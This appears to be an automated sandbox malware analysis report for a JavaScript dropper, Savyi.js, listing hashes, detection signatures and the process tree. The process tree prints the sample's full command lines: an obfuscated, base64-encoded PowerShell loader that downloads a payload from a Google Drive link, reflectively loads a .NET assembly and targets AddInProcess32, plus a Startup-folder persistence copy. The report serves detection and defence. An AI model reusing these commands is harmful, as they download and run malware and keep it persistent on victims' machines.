Analysis
-
max time kernel
91s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-10-2024 17:05
Static task
static1
Behavioral task
behavioral1
Sample
Savyi.js
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Savyi.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Savyi.js
Resource
win10ltsc2021-20241023-en
General
-
Target
Savyi.js
-
Size
60KB
-
MD5
caf142ae86793cd64c2947889f57ce28
-
SHA1
3c41375b1ee78c89b581b3d2a2aea42f895caab6
-
SHA256
ff6e5b04064c63dd80619d02c242c856bbf4e1f94ab230ca74817c3aa471ece4
-
SHA512
99eef70a65338f8147b9f5400ce3f49475140eb20d406c1cef0014abcd812ba0da5d94c5b61bd6deb0376ded7331fa1b4367283de86dd5f2edb7d215f4be6608
-
SSDEEP
1536:IHXpEjO9Xwq2Sk6e2Nhxdd5pdLv+lIXQXdE4QmuWOMP3HXpEjO9Xwq2Sk6e2Nhx6:IHXp+q62Nhxdd5pdq6k91HXp+q62Nhx6
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4368 powershell.exe 4 4368 powershell.exe -
pid Process 2220 powershell.exe 3000 powershell.exe 4368 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 drive.google.com 2 drive.google.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3492 cmd.exe 3788 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3788 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2220 powershell.exe 2220 powershell.exe 3000 powershell.exe 3000 powershell.exe 4368 powershell.exe 4368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4040 wrote to memory of 3492 4040 wscript.exe 77 PID 4040 wrote to memory of 3492 4040 wscript.exe 77 PID 3492 wrote to memory of 3788 3492 cmd.exe 79 PID 3492 wrote to memory of 3788 3492 cmd.exe 79 PID 3492 wrote to memory of 2220 3492 cmd.exe 80 PID 3492 wrote to memory of 2220 3492 cmd.exe 80 PID 4040 wrote to memory of 3000 4040 wscript.exe 81 PID 4040 wrote to memory of 3000 4040 wscript.exe 81 PID 3000 wrote to memory of 4368 3000 powershell.exe 83 PID 3000 wrote to memory of 4368 3000 powershell.exe 83
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Savyi.js1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Savyi.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Savyi.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABFAE4AVgA6AEMATwBNAHMAUABlAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8AaQBOACcAJwApACAAKAAgACgAKAAnADgATwBaAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABOADYASQBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AJwArACcAMQBBACcAKwAnAEkAVgBnAEoASgBKAHYAMQBGACcAKwAnADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAIABOADYASQA7ADgATwBaAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlACcAKwAnAGIAQwBsAGkAZQBuAHQAOwA4AE8AWgBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgADgATwBaAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAA4AE8AWgBpAG0AYQBnACcAKwAnAGUAVQByAGwAKQA7ADgATwBaAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQAnACsAJwBuACcAKwAnAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdAAnACsAJwBTACcAKwAnAHQAcgBpACcAKwAnAG4AJwArACcAZwAoADgATwBaAGkAbQBhAGcAZQBCACcAKwAnAHkAdABlAHMAKQA7ADgATwBaAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAE4ANgBJADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ATgA2AEkAOwAnACsAJwA4AE8AWgBlAG4AZABGAGwAJwArACcAYQBnACAAPQAgAE4ANgBJADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBOADYASQA7ADgATwAnACsAJwBaAHMAdABhACcAKwAnAHIAdABJAG4AZABlAHgAIAA9ACAAOABPAFoAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAOABPAFoAcwB0AGEAcgB0AEYAbABhAGcAKQA7ADgATwBaAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAnACsAJwA4AE8AWgBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAA4AE8AWgBlAG4AZABGAGwAYQBnACkAOwA4AE8AWgBzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgADgATwBaAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJwArACcAOAAnACsAJwBPAFoAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ADgATwBaAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AJwArACcAIAA4AE8AWgBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAOABPAFoAYgBhAHMAZQA2ADQATAAnACsAJwBlAG4AZwB0AGgAIAA9ACAAJwArACcAOABPAFoAZQBuAGQASQBuAGQAZQB4ACAALQAgADgATwBaAHMAdABhAHIAdABJAG4AZABlAHgAJwArACcAOwA4AE8AWgBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgADgATwBaAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0ACcAKwAnAHIAaQBuAGcAKAA4AE8AWgBzAHQAYQByAHQASQBuAGQAZQB4ACwAIAA4AE8AWgBiAGEAcwBlADYANABMAGUAbgBnAHQAJwArACcAaAApADsAOABPAFoAYgAnACsAJwBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAOABPAFoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAAwAE4AUAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAA4AE8AWgBfACAAfQApAFsALQAxAC4ALgAtACgAOABPAFoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAEwAZQBuAGcAdABoACkAXQA7ADgATwBaAGMAJwArACcAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAA4AE8AWgBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7ADgATwBaAGwAbwBhACcAKwAnAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdAAnACsAJwBpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAOABPAFoAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ADgATwBaAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABOADYASQBWAEEASQBOADYASQApADsAOABPAFoAdgBhAGkATQAnACsAJwBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoADgATwBaAG4AdQBsAGwALAAgAEAAKABOADYASQAwAC8AZQB6AHEAVAA1AC8AZAAvAGUAZQAuACcAKwAnAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBOADYASQAsACAATgA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAnACsAJwAsACAATgAnACsAJwA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAsAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkAJwArACcALABOADYASQBkAGUAcwBhAHQAaQB2AGEAZABvAE4ANgBJACwATgA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAsAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALABOADYASQBkAGUAcwBhAHQAaQB2AGEAZABvAE4ANgBJACwATgA2AEkAMQBOADYAJwArACcASQAsAE4ANgBJACcAKwAnAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkAKQApADsAJwApACAALQByAGUAcABsAGEAYwBlACAAIAAnADgATwBaACcALABbAEMAaABhAHIAXQAzADYAIAAtAHIAZQBwAGwAYQBjAGUAIAAgACcAMABOAFAAJwAsAFsAQwBoAGEAcgBdADEAMgA0AC0AcgBlAHAAbABhAGMAZQAnAE4ANgBJACcALABbAEMAaABhAHIAXQAzADkAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $ENV:COMsPec[4,15,25]-JoiN'') ( (('8OZimageUrl = N6Ihttps://drive.google.com/uc?export=download&id='+'1A'+'IVgJJJv1F'+'6vS4sUOybnH-sDvUhBYwur N6I;8OZwebClient = New-Objec'+'t System.Net.We'+'bClient;8OZimageBytes = 8OZwebClient.DownloadData(8OZimag'+'eUrl);8OZimageText = [System.Text.E'+'n'+'coding]::UTF8.Get'+'S'+'tri'+'n'+'g(8OZimageB'+'ytes);8OZstartFlag = N6I<<BASE64_START>>N6I;'+'8OZendFl'+'ag = N6I<<BASE64_END>>N6I;8O'+'Zsta'+'rtIndex = 8OZimageText.IndexOf(8OZstartFlag);8OZendIndex = '+'8OZimageText.IndexOf(8OZendFlag);8OZstartIndex -ge 0 -and 8OZendIndex -gt '+'8'+'OZstartIndex;8OZstartIndex +='+' 8OZstartFlag.Length;8OZbase64L'+'ength = '+'8OZendIndex - 8OZstartIndex'+';8OZbase64Command = 8OZimageText.Subst'+'ring(8OZstartIndex, 8OZbase64Lengt'+'h);8OZb'+'ase64Reversed = -join (8OZbase64Command.ToCharArray() 0NP ForEach-Object { 8OZ_ })[-1..-(8OZbase64Command.'+'Length)];8OZc'+'ommandBytes = [System.Convert]::FromBase64String(8OZbase64Reversed);8OZloa'+'dedAssembly = [System.Reflect'+'ion.Assembly]::Load(8OZcommandBytes);8OZvaiMethod = [dnlib.IO.Home].GetMethod(N6IVAIN6I);8OZvaiM'+'ethod.Invoke(8OZnull, @(N6I0/ezqT5/d/ee.'+'etsap//:sptthN6I, N6IdesativadoN6I, N6IdesativadoN6I, N6IdesativadoN6I, N6IAddInProcess32N6I, N6IdesativadoN6I'+', N'+'6IdesativadoN6I,N6IdesativadoN6I'+',N6IdesativadoN6I,N6IdesativadoN6I,N6IdesativadoN6I,N6IdesativadoN6I,N6I1N6'+'I,N6I'+'desativadoN6I));') -replace '8OZ',[Char]36 -replace '0NP',[Char]124-replace'N6I',[Char]39) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5437395ef86850fbff98c12dff89eb621
SHA19cec41e230fa9839de1e5c42b7dbc8b31df0d69c
SHA2569c39f3e1ee674a289926fddddfc5549740c488686ec6513f53848a225c192ba6
SHA512bc669893f5c97e80a62fc3d15383ed7c62ffc86bc986401735903019bb96a5f13e4d0f6356baa2021267503a4eb62681e58e28fcff435350e83aa425fa76cd64
-
Filesize
944B
MD50c07692919bae44a6c52439fed073338
SHA1e32771a60f0bc601eb817bd812155477199aaea7
SHA256f810e63ccdc0cbb4f587323d6c83baf9252ed2a71ee5951dd646a51069000405
SHA51201394439fab8cd7063387ef427d756a3844fc9f28d3577e0099990f65ffee1a9d5235ec5ab051841832d3ffb04db811561baede6c3b37178c09fa7257e500733
-
Filesize
64B
MD5ad1621c60bd4ee5a63f31400b8a85e17
SHA18cc83c0a27b1a47538d1d2b2dbf59cd4c9257b03
SHA2561d875e29e4ae41fdf5fc736864be396729ac92dbc92da6bde9ae48745bcd0d9f
SHA51226bbb99d4f4e73ba2a2e3a6d1cf0cd583ba5df80727b9d6ae2f11deefc361157c3c86ea54287da90152d4e2ffa905bd02882111601568d20b91127bd3299a6ff
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82